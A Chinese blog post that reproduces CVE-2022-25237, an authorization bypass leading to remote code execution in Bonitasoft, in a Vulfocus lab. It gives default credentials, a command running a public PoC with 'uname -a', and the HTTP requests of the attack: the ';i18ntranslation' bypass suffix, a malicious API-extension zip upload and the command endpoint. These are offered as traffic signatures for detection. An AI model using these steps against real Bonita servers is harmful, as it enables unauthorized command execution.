CVE-2022-25237 Bonitasoft Platform RCE漏洞复现

最新推荐文章于 2024-01-24 17:23:42 发布
最新推荐文章于 2024-01-24 17:23:42 发布
阅读量1.1k 收藏
点赞数 2
分类专栏: 漏洞复现【Free】 文章标签: 网络安全 web安全 安全威胁分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44281295/article/details/127412330
版权

目录

0x01 声明:

0x02 简介:

0x03 漏洞概述:

0x04 影响版本:

For community(社区版):

For subscription(订阅版):

0x05 环境搭建:

Vulfocus环境搭建:

漏洞环境搭建:

访问页面:

0x06 漏洞复现:

创建用户:

利用POC:

0x07 流量分析:

特征一:

客户端:

服务端:

特征二:

客户端:

服务端:

特征三:

客户端:

服务端:

特征四:

客户端:

服务端:

0x08 修复建议:

0x09参考连接:

0x01 声明:

        仅供学习参考使用,请勿用作违法用途,否则后果自负。

0x02 简介:

    Bonitasoft 是一个业务自动化平台,可以更轻松地在业务流程中构建、部署和管理自动化应用程序;Bonita 是一个用于业务流程自动化和优化的开源和可扩展平台。

0x03 漏洞概述:

    在Bonitasoft Authorization漏洞版本,由于 API 授权过滤器中配置问题,通过精心构造的的字符串附加到 API URL,能够绕过权限认证。拥有普通用户权限的攻击者在绕过权限认证后,将恶意代码部署到服务器上,进行远程代码执行。

0x04 影响版本:

For community(社区版):

2022.1-u0 (7.14.0) 以下

For subscription(订阅版):

2022.1-u0 (7.14.0) 以下

2021.2-u4 (7.13.4) 以下

2021.1-0307 (7.12.11) 以下

7.11.7 以下

0x05 环境搭建:

Vulfocus环境搭建:

参考这篇文章:

(7条消息) Vulfocus漏洞靶场搭建_Evan Kang的博客-CSDN博客https://blog.csdn.net/qq_44281295/article/details/127022162

漏洞环境搭建:

在Vulfocus环境后台执行:

docker pull bonita:7.13.0

访问页面:

0x06 漏洞复现:

创建用户:

默认账号密码:install/install

利用POC:

下载地址:

https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2022-25237

python CVE-2022-25237.py poc poc http://192.168.119.155:43378/bonita 'uname -a'

0x07 流量分析:

特征一:

客户端:

Url:POST /bonita/loginservice HTTP/1.1

Data:username=poc&password=poc

服务端:

Status_code:HTTP/1.1 204

特征二:

客户端:

Url: POST /bonita/API/pageUpload;i18ntranslation?action=add HTTP/1.1

Content-Disposition: form-data; name="file"; filename="rce_api_extension.zip"

服务端:

Status_code:HTTP/1.1 200

Data:{"filename":"rce_api_extension.zip","tempPath":"tmp_9332037509706769580.zip","contentType":"application\/octet-stream"}

特征三:

客户端:

Url:POST /bonita/API/portal/page/;i18ntranslation HTTP/1.1

Data:{"contentName": "rce_api_extension.zip", "pageZip": "tmp_9332037509706769580.zip"}

服务端:

Status_code:HTTP/1.1 200

Data:{"processDefinitionId":"","updatedBy":"1","urlToken":"custompage_resourceNameRestAPI","displayName":"RCE","lastUpdateDate":"2022-10-19 09:12:08.054","description":"REST API to manage resourceName","creationDate":"2022-10-19 09:12:08.054","contentName":"rce_api_extension.zip","isHidden":"false","isEditable":"true","createdBy":"1","isProvided":"false","id":"35","isRemovable":"true","contentType":"apiExtension"}

特征四:

客户端:

Url:GET /bonita/API/extension/rce?p=0&c=1&cmd='uname HTTP/1.1

服务端:

Status_code:HTTP/1.1 403

0x08 修复建议:

更新至安全无漏洞版本。

0x09参考连接:

https://rhinosecuritylabs.com/application-security/cve-2022-25237-bonitasoft-authorization-bypass/

Evan Kang
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
Atlassian Confluence存在远程代码执行漏洞CVE-2023-22527) 附POC软件
nnn2188185的博客
01-23 154
Atlassian Confluence存在远程代码执行漏洞CVE-2023-22527) 附POC软件
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
MinIO信息泄露漏洞(CVE-2023-28432)批量检测POC
今天是几号的博客
03-28 1万+
MinIO 是一种开源对象存储服务,与 Amazon S3 API 兼容,可用于私有云或公共云。MinIO是一种高性能、高可用的分布式存储系统,可以存储大量数据,并提供高速的数据读写能力。MinIO采用分布式架构,可以在多个节点上运行,实现数据的分布式存储和处理。在集群部署的Minio中,未授权的攻击者可发送恶意的HTTP请求来获取Minio环境变量中的敏感信息(MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD),可能导致攻击者以管理员权限登录Minio。
【Microsoft Message Queuing远程代码执行漏洞CVE-2023-21554)漏洞修复】
一纸荒芜的博客
06-12 8859
nessus漏扫的漏洞修复
confluence模版注入漏洞_CVE-2023-22527
最新发布
网络安全。
01-24 574
Confluence是Atlassian公司开发的一款专业的企业知识管理与协同软件,可用于构建企业wiki。Confluence Data Center和Confluence Server多个受影响版本中存在模板注入漏洞,未经身份验证的威胁者可利用该漏洞在受影响的实例上实现远程代码执行。
CVE-2023-28252 Windows Common Log File(CLFS)驱动程序中的漏洞
ptsecurity的博客
05-02 1698
Microsoft已经公布了4月份关于修复其产品中安全问题的报告。根据我们对该报告的分析,我们确定了趋势性的漏洞。这次有两个。
CVE-2022-22963 复现Demo
04-14
CVE-2022-22963 复现Demo,A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application ...
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
05-05
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
CVE-2022-30190 漏洞复现
weixin_53884648的博客
11-10 5936
通过exp实现了对微软目前存在的office-word-2016的成功复现
OpenSSL无限循环DOS漏洞CVE-2022-0778)vulhub漏洞复现
qq_53003652的博客
08-03 763
OpenSSL 1.1.1m 版本及以前存在一处逻辑缺陷,攻击者可以利用一个无效的椭圆曲线参数证书,触发一个无限循环导致耗尽目标CPU。由于证书解析发生在验证证书签名之前,任何解析外部提供的证书的进程都可能受到拒绝服务的攻击。OpenSSL是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。这个包广泛被应用在互联网的网页服务器上。执行curl命令访问前面启动的恶意服务器。中的CPU占用即可发现已经100%此时,curl会陷入死循环,查看。
F5公司BIG-IP代码执行漏洞 CVE-2020-5902
huanxiaoji1726的博客
07-06 3359
CVE-2020-5902 漏洞 漏洞描述 F5 BIG-IP 是美国F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。在 F5 BIG-IP 产品的流量管理用户页面 (TMUI)/配置实用程序的特定页面中存在一处远程代码执行漏洞。未授权的远程攻击者通过向该页面发送特制的请求包,可以造成任意Java 代码执行。进而控制 F5 BIG-IP 的全部功能,包括但不限于: 执行任意系统命令、开启/禁用服务、创建/删除服务器端文件等。 代码执行: curl -
Apache iotdb-web-workbench 认证绕过漏洞CVE-2023-24829)
蚁景网安学院
03-28 493
漏洞主要来自于 iotdb-web-workbench​ IoTDB-Workbench是IoTDB的可视化管理工具,可对IoTDB的数据进行增删改查、权限控制等,简化IoTDB的使用及学习成本。iotdb-web-workbench​ 中存在不正确的身份验证漏洞
Spring RCE 漏洞 CVE-2022-22965复现分析
m0_61506558的博客
09-19 5462
关于CVE-2022-22965漏洞的环境调试和内容,网上看了一波,感觉有些知识点内容还是必须要了解才能理解该漏洞,为此详细写了下从Spring框架结构分析,环境搭建到漏洞分析调试整体的一个过程理解,在遇到其他类型的漏洞也可以去调试运用。(一)了解Spring框架由于本文主要介绍漏洞原理流程,所以有关框架不会具体展开,会将涉及到的内容进行解释。1、
VMware Tools本地提权漏洞CVE-2022-31676分析复现
Button12138的博客
01-31 997
VMware Tools本地提权漏洞CVE-2022-31676分析复现
网络靶场实战--BIG-IP CVE漏洞分析(CVE-2022-41622)(CVE-2022-41800)
蛇矛实验室
12-13 1270
这一小节,我们简单分析了F5设备的俩个pre-auth漏洞,了解了rpm注入和csrf漏洞产生原因。并且在此过程中我们简单学习F5设备中 soap接口和rest接口的区别以及利用。蛇矛实验室成立于2020年,致力于安全研究、攻防解决方案、靶场对标场景仿真复现及技战法设计与输出等相关方向。团队核心成员均由从事安全行业10余年经验的安全专家组成,团队目前成员涉及红蓝对抗、渗透测试、逆向破解、病毒分析、工控安全以及免杀等相关领域。
[漏洞分析] CVE-2022-25636 netfilter内核提权
热门推荐
Breeze的博客
03-20 1万+
CVE-2022-25636 netfilter内核提权 文章目录CVE-2022-25636 netfilter内核提权漏洞简介环境搭建漏洞原理漏洞发生点调用栈netfilter的使用以及触发漏洞利用泄露内核net_device结构体地址setxattr来UAF泄露kaslr二次UAF完成内核rop参考 漏洞简介 漏洞编号: CVE-2022-25636 漏洞产品: linux kernel - netfilter 影响版本: linux kernel 5.4 ~ 漏洞危害: netfilter 内核模块
CVE-2022-23131漏洞复测
weixin_42618425的博客
02-23 9612
CVE-2022-23131漏洞复测 1、漏洞介绍 Zabbix Sia Zabbix是拉脱维亚Zabbix SIA(Zabbix Sia)公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。 Zabbix Frontend 存在安全漏洞,该漏洞源于在启用 SAML SSO 身份验证(非默认)的情况下,恶意行为者可以修改会话数据,因为存储在会话中的用户登录未经过验证。 未经身份验证的恶意攻击者可能会利用此问题来提升权限并获得对 Zabbix 前端的管理员访问权限。 2、漏洞复测 利

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Evan Kang

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值